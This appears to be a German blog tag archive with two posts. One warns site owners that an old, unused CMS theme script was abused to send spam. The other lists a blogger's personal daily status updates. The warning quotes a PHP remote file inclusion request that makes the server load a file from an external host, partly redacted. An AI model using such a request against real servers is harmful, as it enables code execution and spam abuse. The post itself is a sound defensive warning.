Tag Archives: Spam

Vorsicht: Alte Scripte als Spamschleuder

Posted on by
Reply

Lücken in alten oder veralteten Scripts können zum Versenden von Spam durch Dritte unter eurer Domain verwendet werden – so geschehen vor ein paar Tagen bei Nils.

Die betreffende Datei war Teil eines CMS-Themes und wurde zwischenzeitlich sicher von den Machern geupdatet, lag aber eben noch (eigentlich ungenutzt) in einer alten Version auf dem Server. Mit [...]/advanced2.php?pluginpath[0]=http://www.[...].net/mega/info.txt? wurde eine externe Datei eingebunden, also eine klassische PHP Remote File Include Vulnerability.
Also unbedingt dafür sorgen dass eure Scripte auf dem aktuellsten Stand sind oder ihr ungenutzte alte Sachen löscht – auch wenn das Arbeit macht – denn ihr haftet dafür was auf euren Servern passiert.

Das war mein 02.04.2007

Posted on by
Reply
  • Heute Morgen per SMS vom Google Calendar geweckt – ha Kolumbus, DAS ist die neue Welt! #
  • Ich wüsste ja mal gerne wer meine Updates von Twitter bekommt, irgendwie kann ich das nicht richtig sehen – wem es zu viel wird bitte melden #
  • Danke, DRAGO Gmbh aus Gummersbach für die zwei Techniker, die grusslos gehen – und mit ihnen die Hälfte unseres Internetanschlusses. #
  • Und ab nach Siegen, ich hoffe nur der Plan ist gut :-) #
  • Okay, laut Plan habe ich so knapp 6 Semesterwochenstunden… hmmm… #
  • Akismet grade mal wieder 144x Spam im DTFDW-Blog löschen lassen, wir haben einfach keinen Bedarf an Cialis & Co. #
  • ich ‘hör auf Dr. Lepperhoff und nehme jetzt eine – das ist doch früh genug, oder? #